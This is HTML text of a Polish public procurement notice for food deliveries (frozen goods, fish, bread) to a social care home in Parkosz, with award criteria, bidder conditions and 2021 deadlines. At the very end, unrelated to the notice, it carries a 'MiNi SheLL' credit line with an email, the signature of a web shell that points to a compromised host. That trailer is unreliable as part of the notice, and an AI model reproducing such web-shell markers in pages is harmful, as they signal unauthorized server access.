przedmiotu zamówienia. <br/>1.10. W przypadku stwierdzenia braków ilościowych w zamówionym towarze, Wykonawca zobowiązuje się uzupełnić towar tego samego dnia dostawy do godz. 1400, bez prawa naliczania jakichkolwiek dodatkowych opłat. Jeżeli brakujący towar nie zostanie dostarczony w tym samym dniu, Wykonawca będzie zobowiązany wystawić fakturę korygującą na wartości dostarczonego towaru. <br/>1.11.W przypadku dostarczenia większej ilości towaru niż zamawiana, Zamawiający ma prawo odmówić przyjęcia nadwyżki oraz domagać się wystawienia faktury korygującej.<br/>1.12.W trakcie realizacji przedmiotu zamówienia Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia zamówienia w zależności od istniejących potrzeb, których aktualnie nie jest w stanie przewidzieć. Poszczególne ilości asortymentów są wielkościami orientacyjnymi. Zwiększenie lub zmniejszenie zakresu ilościowego przedmiotu zamówienia w każdej części może nastąpić maksymalnie o 30% przy czym Wykonawcy nie przysługują w tym zakresie żadne roszczenia wobec Zamawiającego.<br/>1.13.Przedmiot zamówienia jest tożsamy dla wszystkich części z wyłączeniem ust. 2.<br/>2.Szczegółowy opis przedmiotu zamówienia: Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia, opisanego szczegółowo formularzu cenowym, stanowiącym załącznik nr 2 do SWZ dot. części od I do VII. Zgodnie z art. 99 ust. 5 Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym artykułom: Wykonawca musi wykazać równoważność oferowanego przedmiotu zamówienia poprzez wskazanie w opisie rozwiązania równoważnego na podstawie zawartych w opisie przedmiotu zamówienia kryteriów oceny równoważności (opis oraz minimalny skład zamawianego towaru). Zamawiający dopuszcza zaproponowanie towarów w opakowaniach o innych lecz zbliżonych wielkościach/gramaturach (do +/- 5%) od określonych w Załączniku nr 2 do SWZ parametrów jednostki miary.<br/>Cz. VI - Mrożonki, ryby: sukcesywna dostawa mrożonek i ryb, jeden raz w tygodniu w godzinach od 7:00 do 11:00 zgodnie z zamówieniem Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15221000-3 - Ryby mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Kryterium – Cena brutto (C) – waga 60pkt.<br/><br/>Liczona według wzoru:<br/>C=(CN brutto/CO brutto)x60pkt.<br/>Gdzie: C- Wartość punktowa ceny,<br/> CN brutto – Najniższa oferowana cena brutto,<br/> CO brutto – Cena oferty ocenianej brutto.<br/>2)	Kryterium – Dostawa towaru po uwzględnionej reklamacji (Dr) – waga max. 40pkt. Będzie oceniane na podstawie złożonego oświadczenia w formularzu ofertowym, zgodnie z załącznikiem nr 1 do SWZ. Niezaznaczenie czasu dostawy towaru po uwzględnionej reklamacji, będzie oznaczało przyznanie 0 pkt. Zamawiający będzie oceniał czas dostawy towaru po uwzględnionej reklamacji w następujący sposób:<br/>a)	dostawa towaru w terminie 1 dnia kalendarzowego od daty uwzględnionej reklamacji - 40pkt.<br/>b)	dostawa towaru w terminie 2 dni kalendarzowych od daty uwzględnionej reklamacji - 30pkt.<br/>c)	dostawa towaru w terminie 3 dni kalendarzowych od daty uwzględnionej reklamacji - 20pkt.<br/>d)	dostawa towaru w terminie 4 dni kalendarzowych od daty uwzględnionej reklamacji - 10pkt.<br/>e)	dostawa towaru w terminie powyżej 4 dni kalendarzowych od daty uwzględnionej reklamacji - 0 pkt.<br/><br/>2.	Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C + Dr.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa towaru po uwzględnionej reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Parkoszu. <br/>1.1.Przedmiot zamówienia obejmuje sprzedaż wraz z dostarczeniem przez Wykonawcę własnym transportem, artykułów spożywczych do siedziby Zamawiającego, po uprzednim zamówieniu. Zamówienie będzie składane z 1 dniowym wyprzedzeniem przed ustalonym terminem dostawy, mailowo, faksem, telefonicznie lub pisemnie z podaniem ilości oraz rodzaju asortymentu.<br/>1.2.Po dostarczeniu zamówionego towaru Wykonawca jest zobowiązany do rozładowania i wniesienia towaru go do magazynu DPS. Wykonawca zobowiązuje się przekazać towar bezpośrednio osobie uprawnionej do odbioru i kontroli ilościowej i jakościowej. Nie dopuszcza się pozostawiania dostaw przez Wykonawcę osobom nieuprawnionym.<br/>1.3.Koszt transportu i ryzyko ponosi Wykonawca i jest wliczony w cenę zamówienia. <br/>1.4.Dostawa ma odbywać się w godzinach wyznaczanych przez Zamawiającego. Zamówienia będą realizowane sukcesywnie, według potrzeb Zamawiającego. <br/>1.5.Po dokonanym zamówieniu, Wykonawca zobowiązany jest potwierdzić otrzymane zamówienie. <br/>1.6. Zamówiony asortyment musi być najlepszej jakości, wyprodukowany zgodnie z obowiązującymi w tym zakresie normami i przepisami prawa, świeży i nieprzeterminowany. Na każdym opakowaniu powinna znajdować się data minimalnej trwałości lub termin przydatności do spożycia oraz etykieta z występującymi alergenami. Artykuły muszą mieć jak najdłuższy okres przydatności do spożycia. Niedopuszczalne jest dostarczanie towaru z krótką datą przydatności do spożycia, mniej niż 30% czasu licząc od daty produkcji towaru do końcowej daty jego przydatności do spożycia.<br/>1.7.Artykuły spożywcze muszą być składowane i transportowane w sposób zapewniający utrzymanie ich we właściwej jakości handlowej. Artykuły spożywcze muszą być dostarczone przez Wykonawcę transportem, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa, gwarantującymi utrzymanie odpowiedniej temperatury oraz jakości przewożonych artykułów. <br/>1.8.Na każde żądanie Zamawiającego, Wykonawca zobowiązany jest okazać w stosunku do każdego produktu odpowiedni certyfikat zgodności z Polską Normą lub normami europejskim itp. <br/>1.9.Wykonawca zobowiązany jest przestrzegać zalecenia Głównego Inspektora Sanitarnego oraz właściwych ministerstw na czas pandemii COVID-19 w zakresie realizacji przedmiotu zamówienia. <br/>1.10. W przypadku stwierdzenia braków ilościowych w zamówionym towarze, Wykonawca zobowiązuje się uzupełnić towar tego samego dnia dostawy do godz. 1400, bez prawa naliczania jakichkolwiek dodatkowych opłat. Jeżeli brakujący towar nie zostanie dostarczony w tym samym dniu, Wykonawca będzie zobowiązany wystawić fakturę korygującą na wartości dostarczonego towaru. <br/>1.11.W przypadku dostarczenia większej ilości towaru niż zamawiana, Zamawiający ma prawo odmówić przyjęcia nadwyżki oraz domagać się wystawienia faktury korygującej.<br/>1.12.W trakcie realizacji przedmiotu zamówienia Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia zamówienia w zależności od istniejących potrzeb, których aktualnie nie jest w stanie przewidzieć. Poszczególne ilości asortymentów są wielkościami orientacyjnymi. Zwiększenie lub zmniejszenie zakresu ilościowego przedmiotu zamówienia w każdej części może nastąpić maksymalnie o 30% przy czym Wykonawcy nie przysługują w tym zakresie żadne roszczenia wobec Zamawiającego.<br/>1.13.Przedmiot zamówienia jest tożsamy dla wszystkich części z wyłączeniem ust. 2.<br/>2.Szczegółowy opis przedmiotu zamówienia: Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia, opisanego szczegółowo formularzu cenowym, stanowiącym załącznik nr 2 do SWZ dot. części od I do VII. Zgodnie z art. 99 ust. 5 Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym artykułom: Wykonawca musi wykazać równoważność oferowanego przedmiotu zamówienia poprzez wskazanie w opisie rozwiązania równoważnego na podstawie zawartych w opisie przedmiotu zamówienia kryteriów oceny równoważności (opis oraz minimalny skład zamawianego towaru). Zamawiający dopuszcza zaproponowanie towarów w opakowaniach o innych lecz zbliżonych wielkościach/gramaturach (do +/- 5%) od określonych w Załączniku nr 2 do SWZ parametrów jednostki miary.<br/>Cz. VII – Pieczywo: sukcesywna dostawa pieczywa, sześć razy w tygodniu w godzinach od 700 do 1100 zgodnie z zamówieniem Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Kryterium – Cena brutto (C) – waga 60pkt.<br/><br/>Liczona według wzoru:<br/>C=(CN brutto/CO brutto)x60pkt.<br/>Gdzie: C- Wartość punktowa ceny,<br/> CN brutto – Najniższa oferowana cena brutto,<br/> CO brutto – Cena oferty ocenianej brutto.<br/>2)	Kryterium – Dostawa towaru po uwzględnionej reklamacji (Dr) – waga max. 40pkt. Będzie oceniane na podstawie złożonego oświadczenia w formularzu ofertowym, zgodnie z załącznikiem nr 1 do SWZ. Niezaznaczenie czasu dostawy towaru po uwzględnionej reklamacji, będzie oznaczało przyznanie 0 pkt. Zamawiający będzie oceniał czas dostawy towaru po uwzględnionej reklamacji w następujący sposób:<br/>a)	dostawa towaru w terminie 1 dnia kalendarzowego od daty uwzględnionej reklamacji - 40pkt.<br/>b)	dostawa towaru w terminie 2 dni kalendarzowych od daty uwzględnionej reklamacji - 30pkt.<br/>c)	dostawa towaru w terminie 3 dni kalendarzowych od daty uwzględnionej reklamacji - 20pkt.<br/>d)	dostawa towaru w terminie 4 dni kalendarzowych od daty uwzględnionej reklamacji - 10pkt.<br/>e)	dostawa towaru w terminie powyżej 4 dni kalendarzowych od daty uwzględnionej reklamacji - 0 pkt.<br/><br/>2.	Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C + Dr.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa towaru po uwzględnionej reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) dysponuje minimum 1 osobą odpowiedzialną za świadczenie dostawy (np.: dostawcę towaru lub magazyniera lub kierowcę, inne). Wykonawca zobowiązany jest wykazać się, że dysponuje 1 osobą, o której mowa w Rozdziale I ust. 12 SWZ.<br/>b) dysponuje minimum jednym pojazdem dostosowanym do przewozu artykułów spożywczych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania - wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się̨ o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty należy dołączyć: w celu potwierdzenia spełniania przez Wykonawcę warunku zdolności technicznej lub zawodowej:<br/>a)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, minimum 1 osobą odpowiedzialną za świadczenie dostawy (np.: dostawcę towaru lub magazyniera lub kierowcę, inne), w szczególności odpowiedzialne za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zgodnie z Załącznikiem nr 5 do SWZ) oraz, że dysponuje 1 osobą, o których mowa w Rozdziale I ust. 12 SWZ. Zamawiający dopuszcza, ze osoba skierowaną do realizacji zamówienia może być ta sama osoba, o której mowa w Rozdziale I ust. 12 SWZ;<br/>b)	oświadczenie, że dysponuje minimum jednym pojazdem dostosowanym do przewozu artykułów spożywczych, zgodnie z załącznikiem nr 1 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik - pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Pełnomocnictwo dla pełnomocnika do reprezentowania w postepowaniu Wykonawców wspólnie ubiegających się̨ o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się̨ o udzielenie zamówienia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postepowaniu Wykonawców wspólnie ubiegających się̨ o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się̨ o udzielenie zamówienia.<br/><br/>1	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty usługi wykonają poszczególni Wykonawcy.<br/>4	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza zmiany w umowie w zakresie:<br/>1)	ceny i terminu, która może nastąpić na umotywowany pisemny wniosek jednej ze stron umowy po uzyskaniu zgody drugiej strony w formie aneksu z zachowaniem formy pisemnej w sytuacji siły wyższej;<br/>2)	wartości zamówienia w przypadku zmniejszenia lub zwiększenia zamówienia, o którym mowa w § 3 ust. 3 umowy;<br/>3)	zmian przepisów powszechnie obowiązujących, które mają wpływ na treść lub przedmiot umowy, w szczególności zmiany przepisów powszechnie obowiązujących;<br/>4) gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami, albo groziłoby Wykonawcy rażącą stratą w rozumieniu art. 357 Kodeksu cywilnego.<br/>2.	Ustala się zasady wprowadzania zmian wysokości wynagrodzenia w przypadku zmiany stawki podatku od towarów i usług oraz podatku akcyzowego, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>3.	Zamawiający dopuszcza zmiany nieistotne postanowień zawartej umowy, rozumiane w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie czy też na wynik postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-25 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert następuje za pośrednictwem systemu miniPortal: http://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-25 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Nie dotyczy

Creat By MiNi SheLL
Email: jattceo@gmail.com